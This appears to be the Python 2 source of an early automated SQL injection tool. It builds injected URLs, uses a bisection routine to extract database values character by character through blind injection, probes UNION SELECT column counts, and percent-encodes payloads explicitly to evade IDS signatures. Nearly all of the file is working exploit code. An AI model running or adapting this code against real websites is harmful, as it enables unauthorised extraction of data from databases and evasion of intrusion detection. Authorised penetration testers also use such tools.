#!/usr/bin/env python


import md5
import time

version = "0.3"


class Common:
    def log(self, message):
        """
        Print a log message if verbose is enabled.
        """

        if self.args.verbose:
            print "[%s] [INFO] %s" % (time.strftime("%X"), message)


    def warn(self, message):
        """
        Print a warning message if verbose is enabled.
        """

        if self.args.verbose:
            print "[%s] [WARN] %s" % (time.strftime("%X"), message)


    def urlReplace(self, parameter="", value="", newValue=""):
        if not self.args.injParameter:
            return self.args.url.replace("%s=%s" % (parameter, value),
                                         "%s=%s" % (parameter, newValue))
        else:
            value = self.args.parameters[self.args.injParameter]
            return self.args.url.replace("%s=%s" % (self.args.injParameter, value),
                                         "%s=%s" % (self.args.injParameter, value + newValue))


    def __encodeParams(self, params):
        charList = {
                     " ": "%20", "!": "%21", '"': "%22", "#": "%23",
                     "$": "%24", "'": "%27", "(": "%28", ")": "%29",
                     "*": "%2A", "+": "%2B", ",": "%2C", "-": "%2D",
                     ".": "%2E", "/": "%2F", ":": "%3A", ";": "%3B",
                     "<": "%3C", ">": "%3E", "?": "%3F", "@": "%40",
                     "[": "%5B", "\\": "%5C", "]": "%5D", "^": "%5E",
                     "_": "%5F", "`": "%60", "{": "%7B", "|": "%7C",
                     "}": "%7D", "~": "%7E",
                     # "%": "%25", "&": "%26", "=": "%3D"
                   }

        for char, encChar in charList.items():
            params = params.replace(char, encChar)

        return params


    def queryPage(self, url):
        """
        Connect to the target url or proxy and return the target
        url page hash or boolean value in case of string check.
        """

        # Encode parameters special character with corresponding
        # hexadecimal value. This is done to evade IDS common SQL
        # injection signatures and well format the url itself
        url, params = url.split("?")
        params = self.__encodeParams(params)
        url = "%s?%s" % (url, params)

        try:
            if not self.args.proxy:
                conn = self.args.http(self.args.link, self.args.port)
            else:
                conn = self.args.http(self.args.proxy)

            if self.args.httpMethod == "GET":
                conn.putrequest("GET", url)
                conn.putheader("User-Agent", self.args.httpHeaders["User-Agent"])
                conn.endheaders()
            elif self.args.httpMethod == "POST":
                url, parameters = url.split("?")
                conn.putrequest("POST", url)
                conn.putheader("User-Agent", self.args.httpHeaders["User-Agent"])
                conn.putheader("Content-Type", "application/x-www-form-urlencoded")
                conn.putheader("Content-Length", len(parameters))
                conn.endheaders()
                conn.send(parameters)

            response = conn.getresponse()
            page = response.read()
            conn.close()
        except:
            errMsg = "unable to connect to the target url or proxy"
            raise Exception, errMsg

        if not self.args.string:
            return md5.new(page).hexdigest()
        elif self.args.string in page:
            return True
        else:
            return False


    def bisectionAlgorithm(self, baseUrl, expr):
        count = 0
        index = 0
        value = ""
        end = False

        while end != True:
            index += 1
            max = 127
            min = 0

            while (max - min) != 1:
                count += 1
                limit = ((max + min) / 2)

                evilUrl = baseUrl % (expr, index, limit)
                evilResult = self.queryPage(evilUrl)

                if evilResult == self.args.defaultResult:
                    min = limit
                else:
                    max = limit

                if (max - min) == 1:
                    if max == 1:
                        end = True
                        break

                    val = chr(min + 1)
                    value = value + val

        return count, value


    def getValue(self, expression):
        logMsg = "query: %s" % expression
        self.log(logMsg)

        start = time.time()
        expr = self.unescape(expression)
        evilStm = self.createStm()
        baseUrl = self.urlReplace(newValue=evilStm)
        count, value = self.bisectionAlgorithm(baseUrl, expr)

        duration = int(time.time() - start)
        splitValue = value.split("\n")

        if len(splitValue) > 1:
            splitValue = "%s [...]" % splitValue[0]
        else:
            splitValue = "%s" % splitValue[0]

        logMsg = "performed %d queries in %d seconds" % (count, duration)
        self.log(logMsg)

        logMsg = "retrieved: %s" % splitValue
        self.log(logMsg)

        return value


    def parseFp(self, dbms, fingerprint):
        fp = dbms

        if len(fingerprint) == 0:
            return "%s" % fp
        elif len(fingerprint) == 1:
            return "%s %s" % (fp, fingerprint[0])
        else:
            for value in fingerprint:
                fp += " %s and" % value

            return fp[:-4]


    def unionCheck(self):
        logMsg = "testing union on parameter '%s'" % self.args.injParameter
        self.log(logMsg)

        resultDict = {}

        if self.args.injectionMethod == "numeric":
            stm = " UNION SELECT NULL"
        elif self.args.injectionMethod == "stringsingle":
            stm = "' UNION SELECT NULL"
        elif self.args.injectionMethod == "stringdouble":
            stm = '" UNION SELECT NULL'

        for i in range(100):
            if self.args.injectionMethod == "numeric":
                checkStm = stm
            elif self.args.injectionMethod == "stringsingle":
                checkStm = stm + ", '1"
            elif self.args.injectionMethod == "stringdouble":
                checkStm = stm + ', "1'

            baseUrl = self.urlReplace(newValue=checkStm)
            newResult = self.queryPage(baseUrl)

            if not newResult in resultDict.keys():
                resultDict[newResult] = (1, stm)
            else:
                resultDict[newResult] = (resultDict[newResult][0] + 1, stm)

            stm += ", NULL"

            if i > 2:
                for element in resultDict.values():
                    if element[0] == 1:
                        if self.args.httpMethod == "GET":
                            value = baseUrl

                            if not self.args.injectionMethod == "numeric":
                                value = baseUrl.replace("SELECT NULL,", "SELECT")

                            return value
                        elif self.args.httpMethod == "POST":
                            url = baseUrl.split("?")[0]
                            data = baseUrl.split("?")[1]
                            value = "url:\t'%s'" % url

                            if not self.args.injectionMethod == "numeric":
                                data = data.replace("SELECT NULL,", "SELECT")

                            value += "\ndata:\t'%s'\n" % data

                            return value
